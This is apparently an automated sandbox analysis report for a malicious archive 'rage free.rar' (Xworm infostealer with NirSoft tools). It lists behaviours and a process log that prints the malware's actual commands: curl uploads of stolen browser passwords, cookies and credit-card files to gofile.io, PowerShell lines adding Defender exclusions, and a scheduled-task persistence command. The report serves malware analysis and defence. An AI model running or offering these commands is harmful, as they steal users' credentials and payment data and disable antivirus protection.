Analysis Overview
SHA256
b4da01818ad42712ce44298b148f94971ee4a2e0fff1b6f97f09955b9ba8c059
Threat Level: Known bad
The file rage free.rar was found to be: Known bad.
Malicious Activity Summary
Xworm
Detect Xworm Payload
NirSoft WebBrowserPassView
Nirsoft
Downloads MZ/PE file
Sets service image path in registry
Executes dropped EXE
UPX packed file
Checks computer location settings
Loads dropped DLL
Reads user/profile data of web browsers
Drops startup file
Adds Run key to start application
Accesses cryptocurrency files/wallets, possible credential harvesting
Looks up external IP address via web service
Legitimate hosting services abused for malware hosting/C2
Drops file in Windows directory
Unsigned PE
Enumerates physical storage devices
Detects Pyinstaller
Detects videocard installed
Modifies registry class
Uses Task Scheduler COM API
Runs net.exe
Suspicious use of FindShellTrayWindow
Suspicious use of SetWindowsHookEx
Enumerates system info in registry
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of SendNotifyMessage
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: EnumeratesProcesses
Creates scheduled task(s)
Suspicious behavior: LoadsDriver
Gathers system information
Enumerates processes with tasklist
NTFS ADS
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-04-08 00:54
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-04-08 00:53
Reported
2024-04-08 01:27
Platform
win10v2004-20231215-en
Max time kernel
1799s
Max time network
1798s
Command Line
Signatures
Detect Xworm Payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Xworm
NirSoft WebBrowserPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Nirsoft
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Downloads MZ/PE file
Sets service image path in registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\lBmHlTePJveVGiHnIonWMPc\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\lBmHlTePJveVGiHnIonWMPc" | C:\Windows\SoftwareDistribution\Download\qOTtu.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VPkrhDddTg\ImagePath = "\\??\\C:\\Users\\Admin\\AppData\\Local\\Temp\\VPkrhDddTg" | C:\Windows\SoftwareDistribution\Download\q8q5y.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\rage free\Injector.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\injector.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Desktop\rage free\Injector.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Nothere.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\injector.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe | C:\Users\Admin\AppData\Roaming\creal.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windowshalper(legit).lnk | C:\Users\Admin\AppData\Roaming\Nothere.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windowshalper(legit).lnk | C:\Users\Admin\AppData\Roaming\Nothere.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe | C:\Users\Admin\AppData\Roaming\creal.exe | N/A |
Executes dropped EXE
Loads dropped DLL
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windowshalper(legit) = "C:\\Users\\Admin\\AppData\\Roaming\\Windowshalper(legit).exe" | C:\Users\Admin\AppData\Roaming\Nothere.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
| N/A | discord.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | api.ipify.org | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\SoftwareDistribution\Download\qOTtu.exe | C:\Users\Admin\AppData\Roaming\injector.exe | N/A |
| File created | C:\Windows\SoftwareDistribution\Download\q8q5y.exe | C:\Users\Admin\AppData\Roaming\injector.exe | N/A |
Detects Pyinstaller
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | C:\Program Files\7-Zip\7zFM.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1497073144-2389943819-3385106915-1000\{95C05F79-8320-4FBB-9BCD-666A7DF3FCDB} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1497073144-2389943819-3385106915-1000\{12C6F3AF-6270-4AB8-BFB0-A6A5203BBF31} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1497073144-2389943819-3385106915-1000_Classes\Local Settings | C:\Windows\system32\cmd.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | C:\Program Files\7-Zip\7zFM.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 101396.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
| N/A | N/A | C:\Program Files\7-Zip\7zFM.exe | N/A |
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SoftwareDistribution\Download\qOTtu.exe | N/A |
| N/A | N/A | C:\Windows\SoftwareDistribution\Download\q8q5y.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\Nothere.exe | N/A |
| N/A | N/A | C:\Users\Admin\Desktop\VANTA\x64\Release\GeforceNOW.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\rage free.rar"
C:\Program Files\7-Zip\7zFM.exe
"C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\AppData\Local\Temp\rage free.rar"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ff9747646f8,0x7ff974764708,0x7ff974764718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2072,5406018157454078344,12857567957249192065,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2072,5406018157454078344,12857567957249192065,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2072,5406018157454078344,12857567957249192065,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2724 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,5406018157454078344,12857567957249192065,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2072,5406018157454078344,12857567957249192065,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff9747646f8,0x7ff974764708,0x7ff974764718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2120,15903815262483691332,2292567849885689383,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2140 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2120,15903815262483691332,2292567849885689383,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2196 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2120,15903815262483691332,2292567849885689383,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2896 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,15903815262483691332,2292567849885689383,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3328 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2120,15903815262483691332,2292567849885689383,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Desktop\rage free\Injector.exe
"C:\Users\Admin\Desktop\rage free\Injector.exe" "C:\Users\Admin\Desktop\rage free\test.dll"
C:\Users\Admin\AppData\Roaming\injector.exe
"C:\Users\Admin\AppData\Roaming\injector.exe"
C:\Users\Admin\AppData\Roaming\creal.exe
"C:\Users\Admin\AppData\Roaming\creal.exe"
C:\Users\Admin\AppData\Roaming\Nothere.exe
"C:\Users\Admin\AppData\Roaming\Nothere.exe"
C:\Users\Admin\AppData\Roaming\creal.exe
"C:\Users\Admin\AppData\Roaming\creal.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c color 9
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Nothere.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Nothere.exe'
C:\Windows\SoftwareDistribution\Download\qOTtu.exe
"C:\Windows\SoftwareDistribution\Download\qOTtu.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store10.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store10.gofile.io/uploadFile
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windowshalper(legit).exe'
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store10.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store10.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store10.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store10.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store10.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store10.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store10.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crhistories.txt" https://store10.gofile.io/uploadFile
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Windowshalper(legit)" /tr "C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store10.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crbookmarks.txt" https://store10.gofile.io/uploadFile
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\AppData\Roaming\Windowshalper(legit).exe
C:\Users\Admin\Desktop\rage free\Injector.exe
"C:\Users\Admin\Desktop\rage free\Injector.exe"
C:\Users\Admin\AppData\Roaming\injector.exe
"C:\Users\Admin\AppData\Roaming\injector.exe"
C:\Users\Admin\AppData\Roaming\creal.exe
"C:\Users\Admin\AppData\Roaming\creal.exe"
C:\Users\Admin\AppData\Roaming\Nothere.exe
"C:\Users\Admin\AppData\Roaming\Nothere.exe"
C:\Users\Admin\AppData\Roaming\creal.exe
"C:\Users\Admin\AppData\Roaming\creal.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c color 9
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store2.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crpasswords.txt" https://store2.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store2.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcookies.txt" https://store2.gofile.io/uploadFile
C:\Windows\SoftwareDistribution\Download\q8q5y.exe
"C:\Windows\SoftwareDistribution\Download\q8q5y.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store2.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crcreditcards.txt" https://store2.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store2.gofile.io/uploadFile"
C:\Windows\system32\curl.exe
curl -F "file=@C:\Users\Admin\AppData\Local\Temp\crautofills.txt" https://store2.gofile.io/uploadFile
C:\Windows\system32\cmd.exe
